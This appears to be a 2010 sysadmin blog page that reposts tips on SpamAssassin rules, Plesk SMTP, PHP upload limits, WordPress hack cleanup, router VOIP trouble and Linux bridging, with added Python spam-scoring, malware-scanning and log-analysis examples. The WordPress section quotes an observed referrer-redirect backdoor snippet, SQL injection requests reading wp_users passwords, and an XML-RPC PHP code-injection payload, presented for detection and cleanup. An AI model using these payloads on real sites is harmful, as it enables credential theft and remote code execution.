Friday, March 12, 2010

spamassassin block all Viagra emails

SkyHi @ Friday, March 12, 2010

Well, you can try simple rules of this kind:

header VIAGRA_SUBJECT Subject =~ /viagra/i
header VIAGRA_FROM From =~ /viagra/i
meta VIAGRA_HEADER VIAGRA_FROM && VIAGRA_SUBJECT
score VIAGRA_HEADER 10.0
describe VIAGRA_HEADER Block Mails with Viagra in subject

body VIAGRA_BODY /viagra/i
score VIAGRA_BODY 10.0
describe VIAGRA_BODY Block Mails with Viagra in body


===============================================

Put into your local.cf:

body BODY_VIAGRA /viagra/i
describe BODY_VIAGRA Something about viagra
score BODY_VIAGRA 2

Some explanations:
body BODY_VIAGRA /viagra/i
body - search for specified word/phrase in email's body (you can put here 'header' to search headers instead of body).
BODY_VIAGRA - rule name (can be anything you want)
/viagra/i - regex pattern to match your word/phrase. ending 'i' flag means case insensitive

describe BODY_VIAGRA Something about viagra
This line is description for rule BODY_VIAGRA, and description is: "Something about viagra".

score BODY_VIAGRA 2
Gives 2 additional points to every email which matches the BODY_VIAGRA rule.


REFERENCES
http://stackoverflow.com/questions/2246294/local-cf-spamassassin
http://74.125.155.132/search?q=cache:BDvTLmfyqHQJ:www.experts-exchange.com/OS/Linux/Administration/Q_24144658.html+spamassassin+block+viagra&cd=10&hl=en&ct=clnk&gl=ca

Using Plesk’s SMTP Server: DNS Blacklist Prevents Sending

SkyHi @ Friday, March 12, 2010

If you’re trying to use your Plesk’s SMTP service to allow sending e-mail, you might run into the following error: rblsmtpd: <IP ADDRESS>: 451 http://www.spamhaus.org/query/bl?ip=<IP ADDRESS>.

The cause of this error is the enabled option to check DNS blacklists. It finds that the user's (often dynamic) IP address isn't allowed to send e-mail to Plesk's SMTP service. A common cause for this is the use of "zen.spamhaus.org", which is a combination of the SBL, XBL and PBL blacklists.

And the PBL blacklist has the following warning in its FAQ.

Caution: Because the PBL lists normal customer IP space, do not use PBL on smarthosts or SMTP AUTH outbound servers for your own customers (or you risk blocking your own customers if their dynamic IPs are in the PBL). Do not use PBL in filters that do any ‘deep parsing’ of Received headers, or for other than checking IP addresses that hand off to your mailservers.

Disabling zen.spamhaus.org will cure this issue. You can instead enable the xbl.spamhaus.org;sbl.spamhaus.org DNS blackhole list to get the combination of the XBL and SBL blacklists, without the PBL.

This does, however, have another drawback. Enabling the remaining DNS blackhole lists will still prevent (authenticated) e-mail communication over port 25, meaning you still can't send e-mail.

Bummer. But fixable.

Enable the Message Submission option, on the Plesk page Server > Mail.

This makes the SMTP service also available on port 587, configured to allow authenticated SMTP connections regardless of the DNS blackhole list. The only drawback is that it can't be used in combination with zen.spamhaus.org (which is why we changed it in the first place).

Outlook should then be configured to send e-mail over port 587, instead of the default port 25.

Go to Tools > Account Options and double-click the account you're using. Go to More Settings and proceed to the "Advanced" tab. There, you can change the Outgoing mail server (SMTP) port to 587.

Seems like a lot of work, but it appears to be the only way to use the SMTP service in Plesk, in combination with a DNS Blackhole list and dynamic IP ranges.


REFERENCE

http://mattiasgeniar.be/2009/01/14/using-plesks-smtp-server-dns-blacklist-prevents-sending/



I can't upload a file larger than 8MB through a PHP script

SkyHi @ Friday, March 12, 2010
If you have PHP error logging enabled with error_reporting set to E_ALL, you will see this PHP error reported:

PHP Warning: POST Content-Length of 9470478 bytes exceeds the limit of 8388608 bytes in Unknown on line 0

The problem is unset or incorrect settings in your PHP configuration file.

To allow file uploads larger than the default 8 megabytes, put these settings in your php.ini:

post_max_size = 16M
upload_max_filesize = 16M


You can check phpinfo() output to make sure that those values get set correctly.

Also make sure that your script does not have an html form input tag for MAX_FILE_SIZE that is smaller (in bytes) than the size of the files that you are trying to upload.

Now you will be able to upload files up to 16 megabytes.

NOTE: although PHP.net lists post_max_size as being a PHP_INI_PERDIR, because of the way we run PHP in CGI, this cannot be changed in your .htaccess file. However, there is a workaround:

Copy your current php.ini file into the directory that you require the custom post_max_size in.

**THE NEXT STEP IS VERY IMPORTANT**
Obviously, we don't want the outside world to have access to your settings in your php.ini file. The solution? Drop an .htaccess file in the same directory with the following lines in it:

<Files ~ "^.*\.ini">
Deny From All
</Files>

This will deny any web requests to any file in that directory ending in .ini; thus preventing your PHP settings from being seen by others.

Now you have a secure php.ini file that you can modify settings in to affect the .php files within that directory.

REFERENCE
http://support.modwest.com/content/0/219/en/kb.html

Everything about SpamAssassin and spam!

SkyHi @ Friday, March 12, 2010
Contrary to popular belief, spam is easy to combat. All it takes is a well configured SpamAssassin running on the server. Unfortunately "well configured" is very loosely defined in this context, as it's completely different for every domain/server.

One such example is the average person who blocks emails that contain the word "viagra", but an actual medical doctor may use that word rather regularly.

So here is how to make SpamAssassin block 99% of spam:


STEP 1 - Raise score for Realtime Blackhole lists (RBL)

The default scores for RBLs are set too low. For example, if an email is marked as spam by SORBS then there is no reason giving it a score of 2. Based on my tests over a two year period RBLs are very safe to use. There are some issues with SpamCop but those always resolve after a few days.

Edit your "/etc/mail/spamassassin/local.cf" and add:

Code:
# Raise RBL scores
score RCVD_IN_BL_SPAMCOP_NET 10
score RCVD_IN_SBL 5
score RCVD_BY_IP 2
score DNS_FROM_AHBL_RHSBL 3
score URIBL_WS_SURBL 3
score RCVD_IN_SORBS_WEB 3
score RCVD_IN_SORBS_SMTP 3
score URIBL_OB_SURBL 5
score RCVD_IN_NJABL_DUL 4
score RCVD_IN_XBL 5
score RCVD_IN_SORBS_DUL 3
score URIBL_SBL 5
score URIBL_JP_SURBL 4

STEP 2 - Raise score for BAYES

The default scores for BAYES are set to the lowest possible. These scores are automatically generated by a special script used by the SpamAssassin developers, which generates the scores based on all the rules. Unfortunately the high-probability scores are too low: for example a 90% probability is definite spam, so there is no reason why its score should be 2.

Edit your "/etc/mail/spamassassin/local.cf" and add:

Code:
# Raise bayes scores
score BAYES_80 3.5
score BAYES_95 4.5
score BAYES_99 5.0

STEP 3 - S.A. Rules Emporium (SARE)

There is a special team of commandos who track daily spam. These guys have sat down and written rules that target specific strings within spam. One such trick is to scan for the telephone numbers and addresses used in spam; thus they don't need to look for "viagra" in all its different variations, instead they look for the phone number or address of the guy selling it. As a result, their rules allow a doctor to get emails with "viagra" in them, while blocking spam at the same time.

These guys go even further, they have rules for:
- Rules to detect commonly abused redirectors and uri obfuscation techniques.
- Addresses and phone numbers harvested from spam
- Bayes poison using lists of words with equal length
- HTML coding rules that detect various spammer tricks applied through HTML coding within messages
- Header rules that are not found in other SARE rulesets.
- Rule set which flags specific spam and/or spam from specific spammers
- SARE Adult rules are designed to catch spam with "Adult" material.
- SARE "BML" rules are designed to catch "business, marketing and educational" spam.
- SARE Fraud rules are designed to catch "Nigerian 419", "International Lotto", etc. type scams.
- LOADS OF OTHERS...

Their website is at: http://www.rulesemporium.com/

Below are the safest rule sets, which can be used everywhere. Just go to your "/etc/mail/spamassassin/" directory and run the following commands from the shell; that's all you need to do, they are automatically included when SA scans that directory.

Code:
wget http://www.rulesemporium.com/rules/70_sare_evilnum0.cf
wget http://www.rulesemporium.com/rules/70_sare_evilnum1.cf
wget http://www.rulesemporium.com/rules/70_sare_header0.cf
wget http://www.rulesemporium.com/rules/70_sare_html0.cf
wget http://www.rulesemporium.com/rules/70_sare_oem.cf
wget http://www.rulesemporium.com/rules/72_sare_redirect_post3.0.0.cf
wget http://www.rulesemporium.com/rules/99_sare_fraud_post25x.cf
wget http://www.rulesemporium.com/rules/70_sare_genlsubj0.cf

STEP 4 - Final step

Finally, make sure your required score is still set to the default 5 because all the above rules expect that it hasn't been changed.

Code:
required_score 5.0
Once you've run your system with the above and you are comfortable with the results, you may automatically delete spam with a score of 8 or more. The safest way is to create a filter rule in cPanel (Mail -> Email Filtering):

Code:
Select "Any header" that "contains" the string "X-Spam-Level: ********" (without quotes)

The result is this:

$message_headers contains "X-Spam-Level: ********"
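As an added illustration (not SpamAssassin's own code), the Python evaluator below implements the local.cf directives used in this post and in the earlier "spamassassin block all Viagra emails" post (header, body, meta, score, describe, required_score) and derives the X-Spam-Level stars the cPanel filter above keys on. The combined local.cf fragment and the two sample messages are constructed; rules without a score line count 1.0, as in SpamAssassin.

```python
"""Tiny evaluator for the local.cf directives used in the two SpamAssassin posts
on this page (header, body, meta, score, describe, required_score). Added
illustration, not SpamAssassin itself, which has many more rule types."""
import re
from email import message_from_string

# Constructed local.cf fragment combining rules from both posts.
LOCAL_CF = r"""
header VIAGRA_SUBJECT Subject =~ /viagra/i
header VIAGRA_FROM From =~ /viagra/i
meta VIAGRA_HEADER VIAGRA_FROM && VIAGRA_SUBJECT
score VIAGRA_HEADER 10.0
describe VIAGRA_HEADER Block Mails with Viagra in subject
body BODY_VIAGRA /viagra/i
describe BODY_VIAGRA Something about viagra
score BODY_VIAGRA 2
required_score 5.0
"""

_DIRECTIVES = {
    'header': re.compile(r'^header\s+(\w+)\s+(\S+)\s+=~\s+/(.*)/(\w*)$'),
    'body': re.compile(r'^body\s+(\w+)\s+/(.*)/(\w*)$'),
    'meta': re.compile(r'^meta\s+(\w+)\s+(.+)$'),
    'score': re.compile(r'^score\s+(\w+)\s+(-?[\d.]+)$'),
    'describe': re.compile(r'^describe\s+(\w+)\s+(.*)$'),
    'required_score': re.compile(r'^required_score\s+([\d.]+)$'),
}

def parse_local_cf(text):
    """Parse the supported subset of local.cf into a rule table.
    Only the 'i' (case-insensitive) regex flag used in the posts is handled."""
    cfg = {'header': {}, 'body': {}, 'meta': {}, 'score': {}, 'describe': {},
           'required_score': 5.0}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        for kind, rx in _DIRECTIVES.items():
            m = rx.match(line)
            if m:
                break
        else:
            raise ValueError(f'unsupported local.cf line: {line}')
        if kind == 'header':
            cfg['header'][m[1]] = (m[2], re.compile(m[3], re.I if 'i' in m[4] else 0))
        elif kind == 'body':
            cfg['body'][m[1]] = re.compile(m[2], re.I if 'i' in m[3] else 0)
        elif kind == 'required_score':
            cfg['required_score'] = float(m[1])
        else:  # meta, score, describe: a rule name followed by its value
            cfg[kind][m[1]] = float(m[2]) if kind == 'score' else m[2]
    return cfg

_KEYWORDS = {'and', 'or', 'not'}

def _eval_meta(expr, hits):
    """Evaluate 'A && B'-style meta expressions. Only rule names, && || ! and
    parentheses pass the check, and eval() runs with no builtins."""
    if not re.fullmatch(r'[\w\s&|!()]+', expr):
        raise ValueError(f'unsupported meta expression: {expr}')
    py = expr.replace('&&', ' and ').replace('||', ' or ').replace('!', ' not ')
    py = re.sub(r'\b[A-Za-z_]\w*\b',
                lambda m: m[0] if m[0] in _KEYWORDS else str(bool(hits.get(m[0]))), py)
    return bool(eval(py, {'__builtins__': {}}, {}))

def evaluate(cfg, raw_message):
    """Return (total score, sorted names of rules that hit). As in SpamAssassin a
    rule with no score line counts 1.0; '__' sub-rules contribute nothing."""
    msg = message_from_string(raw_message)
    body = msg.get_payload() if not msg.is_multipart() else ''
    hits = {}
    for name, (hdr, rx) in cfg['header'].items():
        hits[name] = bool(rx.search(msg.get(hdr, '')))
    for name, rx in cfg['body'].items():
        hits[name] = bool(rx.search(body))
    for name, expr in cfg['meta'].items():  # meta rules fire after sub-rules
        hits[name] = _eval_meta(expr, hits)
    score = sum(cfg['score'].get(n, 0.0 if n.startswith('__') else 1.0)
                for n, hit in hits.items() if hit)
    return score, sorted(n for n, hit in hits.items() if hit)

def spam_level(score):
    """X-Spam-Level value: one '*' per whole point, which is what the cPanel
    filter 'X-Spam-Level: ********' (8 stars = 8 points or more) keys on."""
    return '*' * int(score) if score > 0 else ''

# Constructed samples: pill spam, and the doctor's mail from the second post.
SPAM = """From: Cheap Viagra <deals@example.invalid>
Subject: Buy VIAGRA now
Content-Type: text/plain

Best viagra prices this week.
"""
HAM = """From: Dr. Smith <smith@clinic.example>
Subject: Prescription question
Content-Type: text/plain

Can we discuss the viagra dosage for patient 42?
"""
```

With these rules the spam scores 14 (both header rules, the meta rule and the body rule) while the doctor's mail only hits the 2-point body rule and stays under required_score.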


REFERENCE
http://www.jaguarpc.com/forums/showthread.php?t=17227


Wednesday, March 10, 2010

Did your WordPress site get hacked?

SkyHi @ Wednesday, March 10, 2010

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
    define('SECRET_KEY', '1234567890');

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the eval() command, or base64_decode(). Here’s a code snippet taken from here:
    <?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

    $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

    if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?><?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check your .htaccess file in the root of your blog. If you’ve never edited it, it should look like this:
    # BEGIN WordPress
    <ifmodule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </ifmodule>
    # END WordPress

    That file may have this chunk of code too which is to do with the uploader:

    <ifmodule mod_security.c>
    <files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </files>
    </ifmodule>
  • They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
    1. Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.
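The checks in the list above can be scripted. The Python scanner below is an added example (not the WordPress Exploit Scanner plugin mentioned later, nor code from the post): it greps PHP files for eval()/base64_decode() and the k1b0rg/keymachine.de markers, flags PHP code inside files with image extensions, and parses a serialized active_plugins value for entries like the ../uploads/... one. The sample blog tree (built with tempfile) and the active_plugins value are constructed.

```python
"""Scanner for the hiding places listed in the post: eval()/base64_decode()
and the k1b0rg/keymachine.de markers in PHP files, PHP code inside image
files, and active_plugins entries that point outside the plugins directory.
Added example, not code from the post or from WordPress."""
import os
import re
import tempfile

PHP_MARKERS = {
    'eval() call': re.compile(r'\beval\s*\('),
    'base64_decode() call': re.compile(r'\bbase64_decode\s*\('),
    'k1b0rg marker': re.compile(r'k1b0rg'),
    'keymachine.de marker': re.compile(r'keymachine\.de'),
}
IMAGE_EXT = {'.jpg', '.jpeg', '.gif', '.png'}

def scan_tree(root):
    """Return sorted (relative path, [reasons]) for suspicious files under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, 'rb') as fh:
                text = fh.read().decode('latin-1')  # lossless, we only grep
            ext = os.path.splitext(fn)[1].lower()
            reasons = []
            if ext in IMAGE_EXT and '<?php' in text:
                reasons.append('PHP code in an image file')
            elif ext == '.php':
                reasons = [why for why, rx in PHP_MARKERS.items() if rx.search(text)]
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, '/')
                findings.append((rel, reasons))
    return sorted(findings)

def php_serialized_strings(blob):
    """Pull the string values out of a PHP serialize()d array such as the
    active_plugins option, honouring the declared byte lengths."""
    out, pos = [], 0
    while True:
        m = re.compile(r's:(\d+):"').search(blob, pos)
        if not m:
            return out
        start, n = m.end(), int(m[1])
        out.append(blob[start:start + n])
        pos = start + n + 2  # skip the closing '";'

def suspicious_plugins(serialized):
    """active_plugins entries should be 'dir/file.php' inside wp-content/plugins;
    anything with '..', a leading '/' or a non-.php suffix is the uploads trick."""
    return [p for p in php_serialized_strings(serialized)
            if '..' in p or p.startswith('/') or not p.endswith('.php')]

# Constructed active_plugins value: one real plugin plus the disguised jpg.
ACTIVE_PLUGINS = ('a:2:{i:0;s:19:"akismet/akismet.php";'
                  'i:1;s:39:"../uploads/2008/05/04/jhjyahjhnjnva.jpg";}')

def build_demo_tree():
    """Constructed blog tree: a clean theme file, a theme file carrying the
    referrer-redirect snippet quoted in the post, and PHP hidden in a .jpg."""
    root = tempfile.mkdtemp(prefix='wpscan-')
    files = {
        'wp-content/themes/demo/header.php': '<?php wp_head(); ?>',
        'wp-content/themes/demo/footer.php':
            '<?php if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://"'
            '.base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>',
        'wp-content/uploads/2008/05/04/jhjyahjhnjnva.jpg':
            '<?php /* constructed stand-in for a backdoor body */ ?>',
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w') as fh:
            fh.write(content)
    return root

if __name__ == '__main__':
    for path, why in scan_tree(build_demo_tree()):
        print(path, '->', ', '.join(why))
    print('bad active_plugins entries:', suspicious_plugins(ACTIVE_PLUGINS))
```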

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for its 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )
  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.
    HTTP_RAW_POST_DATA: <?xml version="1.0"?>

    <methodCall>

    <methodName>system.multicall</methodName>

    <params>

    <param><value><array><data>

    <value><struct>

    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>

    <member><name>params</name><value><array><data>

    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

    </data></array></value></member>

  5. That fails too so the query is repeated with similar SQL.
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
  6. Then he tries a trackback:
    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\’
    [1740009377] => 1
    [496546471] => 1
    )
  7. And another trackback:
    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\’)/*
    [charset] => UTF-7
    )
  8. Before finally going back to xmlrpc.php with this POST request:
    <?xml version="1.0"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>
  9. In between, he also tries the following GET requests:
    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1
  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
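Detection logic for the probe sequence above, as an added example rather than the author's own logging setup: it runs over constructed Apache combined-format log lines that reuse the attacker IP, the user-agent string and the two GET requests quoted in the post; the timestamps and the benign visitor are made up.

```python
"""Flag the request pattern described in the post (scanner user-agent, repeated
HEAD probes of wp-admin/post.php, UNION SELECT against wp_users) in Apache
combined-format access logs. Added example; the sample lines are constructed."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# UNION SELECT reading the WordPress users table, as in the GET requests above.
SQLI_RE = re.compile(r'union\s+(?:all\s+)?select\b.*\bwp_users\b', re.I | re.S)
# Marker from the "ekibastos" user-agent string quoted above.
SCANNER_UA_RE = re.compile(r'k1b compatible', re.I)

SCANNER_UA = 'Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)'

def _line(ip, hhmm, request, status, ua):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [08/Mar/2010:03:{hhmm} +0000] "{request}" {status} 0 "-" "{ua}"'

SAMPLE_LOG = [  # constructed
    _line('87.118.100.81', '14:01', 'GET /wp-admin/ HTTP/1.1', 302, SCANNER_UA),
    _line('87.118.100.81', '14:02', 'HEAD /wp-admin/post.php HTTP/1.1', 302, SCANNER_UA),
    _line('87.118.100.81', '14:02', 'HEAD /wp-admin/post.php HTTP/1.1', 302, SCANNER_UA),
    _line('87.118.100.81', '14:03', 'HEAD /wp-admin/post.php HTTP/1.1', 302, SCANNER_UA),
    _line('87.118.100.81', '14:09', 'GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,'
          'CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1',
          200, SCANNER_UA),
    _line('198.51.100.7', '20:00', 'GET /?cat=3 HTTP/1.1', 200,
          'Mozilla/5.0 (X11; Linux) Firefox/3.6'),
]

def parse_log_line(line):
    """Return the fields of one combined-format line, or None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def decode_path(path):
    """Decode twice so a double-encoded quote (%2527 -> %27 -> ') is seen as the
    quote it becomes inside the application."""
    return unquote_plus(unquote_plus(path))

def analyse(lines, head_threshold=3):
    """Return {ip: sorted reasons} for clients whose requests match the pattern."""
    reasons = defaultdict(set)
    head_probes = Counter()
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        if SQLI_RE.search(decode_path(rec['path'])):
            reasons[rec['ip']].add('sql injection against wp_users')
        if SCANNER_UA_RE.search(rec['ua']):
            reasons[rec['ip']].add('known scanner user-agent')
        if rec['method'] == 'HEAD' and rec['path'].startswith('/wp-admin/post.php'):
            head_probes[rec['ip']] += 1
    for ip, n in head_probes.items():
        if n >= head_threshold:
            reasons[ip].add('repeated HEAD probes of wp-admin/post.php')
    return {ip: sorted(r) for ip, r in reasons.items()}

if __name__ == '__main__':
    for ip, why in analyse(SAMPLE_LOG).items():
        print(ip, '->', '; '.join(why))
```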

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>

<methodCall>

<methodName>test.method

</methodName>

<params>

<param>

<value><name>','')); echo

'______BEGIN______';

passthru('id');

echo

'_____FIM_____';

exit;/*</name></value>

</param>

</params>

</methodCall>

Edit: Tripwire url fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.


REFERENCE:
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

Monday, March 8, 2010

VOIP problem

SkyHi @ Monday, March 08, 2010
I currently got 2 problems with my WNR854T router, perhaps someone can help me here. I'm using firmware version 1.4.22.

* My VOIP router in bridge mode is somehow blocked by the WNR854T, I have tried UPNP and configuring port forwarding myself. I have forwarded the following ports manually: 5060-5061, 10000-10007, 3478-3479. VOIP works great on my old DLink router (configured those ports manually there too), but the netgear router seems to block the connection when making the actual phone call. I have tried disabling the SPI, but it doesn't help.

Anyone got any good suggestions how to make the VOIP work through the netgear router? Perhaps I should try an older firmware version?

* If I do an erase and start to reconfigure the router, I usually start by disabling the wireless, after doing most of my settings the "Enable Wireless Router Radio" setting gets enabled by itself automatically, and the funny thing is that I can't disable it again after that!

=============

Since Jope says that the ‘VOIP router is in bridge mode’ this implies to me that the VOIP router is also the modem? If so it will be on the WAN side of the Netgear router in which case DMZ would not be applicable? I don't do VOIP so could be wide of the mark here, but wouldn't the audio connection to the VOIP router also be on the WAN side of the Netgear, i.e. direct to the VOIP router? It might help if we knew the brand and model number of the VOIP router.

=============
Thanks for the answers, but I solved this by downgrading to firmware version 1.4.09.

Actually the VOIP router is connected as "just another device" on the LAN side. I tried setting it as DMZ before I downgraded, but it didn't work, somehow it could not get a proper connection to the server. The router is a Vood 322i.

Don't know if the problem with automatic wireless activation was solved by downgrading the firmware, don't really want to change anything now that I got it "working".

Lesson learned, next time I get the idea I need a new router I will build it myself and run pfsense or m0n0wall on it.


===========
Are you using UPnP? Yes.
Disable SPI? Yes.
DMZ? No.
Port forwarding? No.

==========

REFERENCE
http://forum1.netgear.com/showthread.php?p=52928



Sharing Internet connection using bridge mode

SkyHi @ Monday, March 08, 2010

Internet connection can be shared with another computer if you have a free Ethernet port

Sharing via bridge mode


When using an ISP box (modem/router), first activate its router functions so that it can assign a different IP to each PC.

E.g.
Imagine that you have a PC with 2 Ethernet interfaces:

eth0 is connected to the Internet (and is automatically assigned IP 192.168.0.x by DHCP).
eth1 is a free interface (configured with a fixed IP 10.0.0.1).



Your /etc/network/interfaces file must look like this:
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto eth1
iface eth1 inet static
address 10.0.0.1
netmask 255.255.255.0


We will connect a second PC to the eth1 port like this:



Making use of the bridge implies that any Ethernet frame received on one Ethernet interface (eth0 or eth1) will be re-issued on the other, just like when connecting 2 PCs via a hub.



PC2 will have its IP address automatically assigned by the box, and can connect directly to the Internet.
Installation

Installing bridge-utils


Type: sudo apt-get install bridge-utils

Change the configuration

Modify the /etc/network/interfaces file

auto lo
iface lo inet loopback

auto br0
iface br0 inet dhcp
bridge_ports eth0 eth1

auto eth1
iface eth1 inet static
address 10.0.0.1
netmask 255.255.255.0

Notes


To validate this configuration, type: sudo /etc/init.d/networking restart

The bridge br0 is configured to obtain an IP address via DHCP and is then told to connect eth0 and eth1 "virtually" using the directive: bridge_ports eth0 eth1.

On PC2, you just have to configure it with DHCP (automatic IP address).

REFERENCE
http://en.kioskea.net/faq/1089-sharing-internet-connection-using-bridge-mode

